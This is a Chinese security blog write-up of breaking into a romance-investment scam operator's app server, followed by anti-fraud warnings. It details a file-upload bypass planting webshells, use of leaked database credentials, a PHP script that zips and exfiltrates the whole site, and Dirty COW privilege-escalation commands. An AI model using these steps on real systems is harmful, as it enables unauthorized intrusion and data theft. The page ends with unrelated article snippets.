记一次杀猪盘的渗透之旅

VSole2022-01-02 06:40:29

所谓“杀猪盘”,是指诈骗分子利用网络交友通常是“异性”交友,诱导受害人下载诈骗APP并在上面进行各种“投资”,如菠菜、股票、期货甚至虚拟货币的网络诈骗。今年某月某日小白就遭遇了这种骗局,他先是被骗子通过QQ添加并下载了一个名为”心动“的APP,在“心动“APP上结识了位名为“xx老师”的美女小白被美色迷了眼打算相约这名网友,但是美女则借口让他下载另一个名为午夜乐园的APP进行投资,果不其然小白被成功骗取10余万。

0x01 APP测试准备

根据小白的描述,我们关注到以下几点信息,分别是 QQ、“心动”APP以及“午夜乐园”APP,但是小白因不堪被骗将骗子QQ删除了。所以我们无法从QQ号这点进行入手,但是这两个APP的APK包倒是存在,于是开始渗透分析。

安装APP

使用夜神模拟器安装这两个APP,为了方便起见就使用安卓5.0版本,否则无法抓取到 https 数据包

小知识:从 Android 7.0 开始,默认的网络安全性配置修改,默认不再信任用户添加的 CA 证书,也就不再信任抓包工具的证书

因为“午夜乐园”APP需要邀请码才能注册,所以我们先安装“心动”APP

设置抓包

在 BurpSuite 中设置监听地址以及监听端口,其中地址为内网的IP地址

设置网络中的 HTTP 代理为 BurpSuite 中的代理地址和端口

访问百度,在 Burp Suite 中成功抓取到数据包

现在针对 http 协议的数据包都可以抓取到了

安装证书

接下来为了抓取到 https 的数据包,我们需要为其安装 CA 证书

访问https://burp点击CA开始下载证书,下载完成后在设置中找到安全

选择从SD卡安装

选择之前下载的证书并为证书命名

在用户凭据中已存在证书

访问https://www.baidu.com

在 Burp Suite 中成功抓取到 https 数据包

0x02 上线shell

初探上传漏洞

在APP中注册一个测试账号

发现在发布动态处存在文件上传

使用 Burp Suite 截取数据包,测试后发现目标站点只返回0或1

上传后在朋友圈界面发现该功能正常,那么对应的图片路径在哪呢?

通过抓包发现该图片的具体地址

修改数据包将其文件名后缀修改为php时则无法上传,可能存在防护机制

文件上传漏洞获取webshell

尝试了几种绕过方式无果后,在朋友圈背景图片发现文件上传点,将冰蝎上传

幸运的是目标直接返回了木马地址,使用冰蝎连接目标

至此 webshell 成功上线,但可惜的是这是 docker 环境。同时为了维持对目标站点的控制,继续上传了一个哥斯拉马。

0x03 信息收集

查看当前环境

查看当前用户为普通的 www 用户,能够执行一些简单的命令

查看文件管理,发现网站下存在 thinkphp 框架,开始寻找配置文件

数据库登录

在配置文件中发现数据库连接文件

return [
    // 数据库类型
    'type'            => Env::get('database.type', 'mysql'),
    // 服务器地址
    'hostname'        => Env::get('database.hostname', '192.168.0.59'),
    // 数据库名
    'database'        => Env::get('database.database', 'netchat'),
    // 用户名
    'username'        => Env::get('database.username', 'root'),
    // 密码
    'password'        => Env::get('database.password', 'MysqlNetchatPWD#'),
    // 端口
    'hostport'        => Env::get('database.hostport', '3305'),
];

由于无法通过冰蝎无法连接数据库,我们上传 adminer 连接数据库,将服务器地址设置为192.168.0.59:3305,输入账号和密码。

在 adminer 中选择数据库导出,将当前数据库直接打包下载

后台地址与账号密码

在数据库中还有些意外收获,里面包含了一些管理员的账号密码

经过解密后发现 admin666 密码为123456

查看 admin_log 表后发现登录地址为https://xx.xx.xx.xx/adim888/index/login

访问后为如下界面,我们只需要输入账号密码与谷歌验证码即可登录,为了不打草精神未直接登录后台。

打包网站

接下来为了方便分析,使用如下脚本打包整个网站进行下载

 
error_reporting(0);
 
class PHPZip{
    var $dirInfo = array("0","0");
    var $datasec = array();
    var $ctrl_dir = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset   = 0;
 
    function createZip($dir, $zipfilename){
        if (@function_exists('gzcompress')){
            @set_time_limit("0");
            if (is_array($dir)){
                $fd = fopen ($dir, "r");
                $fileValue = fread ($fd, filesize ($filename));
                fclose ($fd);
                if (is_array($dir)) $filename = basename($dir);
                $this -> addFile($fileValue, "$filename");
            }else{
                $this->dirTree($dir,$dir);
            }
 
            $out = $this -> filezip();
            $fp = fopen($zipfilename, "w");
            fwrite($fp, $out, strlen($out));
            fclose($fp);
            $filesize = filesize($zipfilename);
 
            if ($filesize < 104857600) {
                echo "create zip success!";
            } else {
                echo "create zip error!";
            }        }
     }
 
    //get dir tree..
    function dirTree($directory,$rootDir){
        $fileDir = $rootDir;
        $myDir = dir($directory);
        while($file=$myDir->read()){
            if(is_dir("$directory/$file") and $file!="." and $file!=".."){
                $this->dirInfo[0]++;
                $rootDir ="$fileDir$file/";
                $this -> addFile('', "$rootDir");
 
                //go on n's folders
                $this->dirTree("$directory/$file",$rootDir);
            }else{
                if($file!="." and $file!=".."){
                    $this->dirInfo[1]++;
                    $fileValue = file_get_contents("$directory/$file");
                    $this -> addFile($fileValue, "$fileDir$file");
                }
            }
        }
        $myDir->close();
    }
 
    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
 
        if ($timearray['year'] < 1980) {
             $timearray['year'] = 1980;
             $timearray['mon'] = 1;
             $timearray['mday'] = 1;
             $timearray['hours'] = 0;
             $timearray['minutes'] = 0;
             $timearray['seconds'] = 0;
        } // end if
 
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }
 
    function addFile($data, $name, $time = 0){
        $name = str_replace('\\', '/', $name);
 
        $dtime = dechex($this->unix2DosTime($time));
        $hexdtime = '\x' . $dtime[6] . $dtime[7]
                  . '\x' . $dtime[4] . $dtime[5]
                  . '\x' . $dtime[2] . $dtime[3]
                  . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');
 
        $fr = "\x50\x4b\x03\x04";
        $fr .= "\x14\x00";            // ver needed to extract
        $fr .= "\x00\x00";            // gen purpose bit flag
        $fr .= "\x08\x00";            // compression method
        $fr .= $hexdtime;             // last mod time and date
 
        // "local file header" segment
        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        $c_len = strlen($zdata);
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // fix crc bug
        $fr .= pack('V', $crc);             // crc32
        $fr .= pack('V', $c_len);           // compressed filesize
        $fr .= pack('V', $unc_len);         // uncompressed filesize
        $fr .= pack('v', strlen($name));    // length of filename
        $fr .= pack('v', 0);                // extra field length
        $fr .= $name;
 
        // "file data" segment
        $fr .= $zdata;
 
        // "data descriptor" segment (optional but necessary if archive is not
        // served as file)
        $fr .= pack('V', $crc);                 // crc32
        $fr .= pack('V', $c_len);               // compressed filesize
        $fr .= pack('V', $unc_len);             // uncompressed filesize
 
        // add this entry to array
        $this -> datasec[] = $fr;
        $new_offset        = strlen(implode('', $this->datasec));
 
        // now add to central directory record
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";                // version made by
        $cdrec .= "\x14\x00";                // version needed to extract
        $cdrec .= "\x00\x00";                // gen purpose bit flag
        $cdrec .= "\x08\x00";                // compression method
        $cdrec .= $hexdtime;                 // last mod time & date
        $cdrec .= pack('V', $crc);           // crc32
        $cdrec .= pack('V', $c_len);         // compressed filesize
        $cdrec .= pack('V', $unc_len);       // uncompressed filesize
        $cdrec .= pack('v', strlen($name) ); // length of filename
        $cdrec .= pack('v', 0 );             // extra field length
        $cdrec .= pack('v', 0 );             // file comment length
        $cdrec .= pack('v', 0 );             // disk number start
        $cdrec .= pack('v', 0 );             // internal file attributes
        $cdrec .= pack('V', 32 );            // external file attributes - 'archive' bit set
 
        $cdrec .= pack('V', $this -> old_offset ); // relative offset of local header
        $this -> old_offset = $new_offset;
 
        $cdrec .= $name;
 
        // optional extra field, file comment goes here
        // save to central directory
        $this -> ctrl_dir[] = $cdrec;
    }
 
    function filezip(){
        $data = implode('', $this -> datasec);
        $ctrldir = implode('', $this -> ctrl_dir);
 
        return
            $data .
            $ctrldir .
            $this -> eof_ctrl_dir .
            pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries "on this disk"
            pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries overall
            pack('V', strlen($ctrldir)) .           // size of central dir
            pack('V', strlen($data)) .              // offset to start of central dir
            "\x00\x00";                             // .zip file comment length
    }
}
 
$zip = new PHPZip(); 
$path = $_GET['path'];
$filename = $_GET['filename'];
if (isset($path)&&isset($filename)) {
    $zip -> createZip($path, $filename);
} else {
    echo "please input correct path and filename, like http://example.com?path=/home&filename=home.zip";
}
 
?>

IP地址查询

通过简单的sql语句对 admin 登录日志进行查询

select distinct ip from yl_admin_log limit 50

发现该站点的登录IP都是国外的IP,猜测网站管理员都是通过代理或本身就在国外访问的后台

而查询 yl_core_ip 表中发现了一个IP

查询微步后,该IP已经被打上了恶意地址标签

0x04 权限提升

由于当前权限比较低,我们也需要拿到 docker 环境下的 root 权限,但是没有提权成功,自然也无法利用 docker 逃逸来跳到其真实环境下。这里演示下我使用脏牛提权的失败记录吧。

系统信息收集

uname -a
cat /etc/issue

当前系统为 Debian GNU/Linux 10

漏洞查询

上传linuxenum和linux-exploit-suggestor,赋予执行权限并执行

chmod 777 linuxenum.sh
chmod 777 linux-exploit-suggestor.sh

脏牛提权

通过 linux-exploit-suggestor 返回的结果,其中存在脏牛漏洞

wget https://www.exploit-db.com/download/40616 ##这里我直接上传了
mv 40616 cowroot.c
## 正式从这开始
gcc cowroot.c -o cowroot -pthread
chmod +x cowroot
./cowroot

失败过程就不截图了

0x05 受骗分析及警示

登录客服查看聊天记录

在数据库中还有相关客服用户的账号密码,直接解码后面的 base64 编码就可以获取到明文

登录几个客服用户进行查看

杀猪盘流程

这里我们也根据小白的注册时间找到了它的账号,为q123456x

通过注册IP确认该用户为受害人账号。但是尝试登录后发现该用户已经被锁定,在数据库中发现该用户的islogin为0,修改为1后还是无法登录,通过查看管理员的操作记录,发现其一直在封锁账号。

再根据几个客服的聊天记录,我们总结了”杀猪盘“流程

1、招揽有“交友”目的的年轻人
2、通过客服为其提供“服务”
3、安排”漂亮姐姐“骗取年轻人投资
4、年轻人欲望上头开始投资
5、最终被骗人财两空

警示

1、警惕在私聊中呈现的完美对象,完美人设往往就是诱饵

2、切勿和陌生人谈钱、一起投资,记住,网上“对象”也是陌生人

3、切勿下载安装网上各类投资菠菜APP链接,不要在未验证网站投资

4、不向未验证的陌生账户转账汇款

5、不要参与网上菠菜,涉嫌违法。

6、不要被欲望冲昏了头

本作品采用《CC 协议》,转载必须注明作者和本文链接
所谓“杀猪”,是指诈骗分子利用网络交友通常是“异性”交友,诱导受害人下载诈骗APP并在上面进行各种“投资”,如菠菜、股票、期货甚至虚拟货币网络诈骗。今年某月某日小白就遭遇了这种骗局,他先是被骗子通过QQ添加并下载了一个名为”心动“APP,在“心动“APP上结识了位名为“xx老师”美女小白被美色迷了眼打算相约这名网友,但是美女则借口让他下载另一个名为午夜乐园APP进行投资,果不其然小白被成
目前,新型电信网络诈骗在侵财类犯罪中占比极大,各种骗术层出不穷。据台湾省警务部门统计,1999年台湾省岛内诈骗案件数4262件,2005年猛增至4.3万件,诈骗金额也由1999年12亿元增加到2006年185.9亿元。2008年前后,大陆系诈骗团伙如蒲公英般在全国各地蔓延。
最近,安络君随机统计了50条诈骗资讯,在其中1145条评论中,骂“人傻钱多”共计692条,占了半数以上。被骗人,真的是因为傻吗?聪明你,一定不会被骗吗?但凡对诈骗有一定程度了解人,不会敢下此结论。目前,新型电信网络诈骗在侵财类犯罪中占比极大,各种骗术层出不穷。为此,我们整理出《新型电信网络诈骗TOP10》,其中收录十类骗术难防程度极高,已成为侵犯民众财产主力军。您
11月30日,最高人民检察院发布《检察机关打击治理电信网络诈骗及其关联犯罪工作情况(2023)》(下称《工作情况》)
今天朋友突然告诉我,某转买手机被骗了1200块钱,心理一惊,果然不出所料,那我来试试吧。。在目录下还发现了一个杀猪工具:框框可以一键生成诈骗详情链接:最后根据收集到数据库链接等信息准备进数据库里看一眼,哥斯拉链接有问题:于是搭建frp到骗子服务器访问:信息:由于www用户无法写入mysql目录.so文件,无法使用mysql提权。sudo一直要使用www密码,结果也是无法使用sudo。
今天朋友突然告诉我,某转买手机被骗了1200块钱,心理一惊,果然不出所料,那我来试试吧。。在目录下还发现了一个杀猪工具:框框可以一键生成诈骗详情链接:最后根据收集到数据库链接等信息准备进数据库里看一眼,哥斯拉链接有问题:于是搭建frp到骗子服务器访问:信息:由于www用户无法写入mysql目录.so文件,无法使用mysql提权。sudo一直要使用www密码,结果也是无法使用sudo。
今年全会,仍以视频会议形式召开,二弟派去卧底第一时间将联合会主席曾狐聪讲话录音整理成文,以飨读者。国家强力推进“断卡”行动后,整个诈骗界洗钱渠道四处受阻,成本急剧攀升。南京警方警情通报 这些成绩取得,得益于各路诈骗精英努力拼搏,得益于各类黑灰产业大力支持,得益于内鬼、漏洞频出互联网企业助力支撑,得益于广大肥羊不听劝阻、执意被骗。
2021年1月6日下午16点左右,本来还要在摸两个点鱼就可以飞法法下班了,照例下班前把安全设备都看了一遍,一刷新系统蹦出几条某某大学下大量二级域名网站被篡改告警,随后经过人工验证所有告警二级网址均存在被篡改页面,并随即报告给了值班客户,随后应客户要求兴(hao)高(bu)采(qing)烈(yuan)地到了现场做应急处置,至于为什么称之为诡异请看下述分析。
2021年1月6日下午16点左右,本来还要在摸两个点鱼就可以飞法法下班了,照例下班前把安全设备都看了一遍,一刷新系统蹦出几条某某大学下大量二级域名网站被篡改告警,随后经过人工验证所有告警二级网址均存在被篡改页面,并随即报告给了值班客户,随后应客户要求兴(hao)高(bu)采(qing)烈(yuan)地到了现场做应急处置,至于为什么称之为诡异请看下述分析。
近年来,公安部、工信部、中国人民银行等部门深入推进打击治理电信网络诈骗违法犯罪,坚持打防并举、防范为先,构建推出了“五大反诈利器”——国家反诈中心APP、96110预警劝阻专线、12381涉诈预警劝阻短信系统、全国移动电话卡“一证通查”服务、云闪付APP“一键查卡”,不断加强预警防范工作,为广大群众构筑防诈反诈“防火墙”。 国家反诈中心APP
VSole
网络安全专家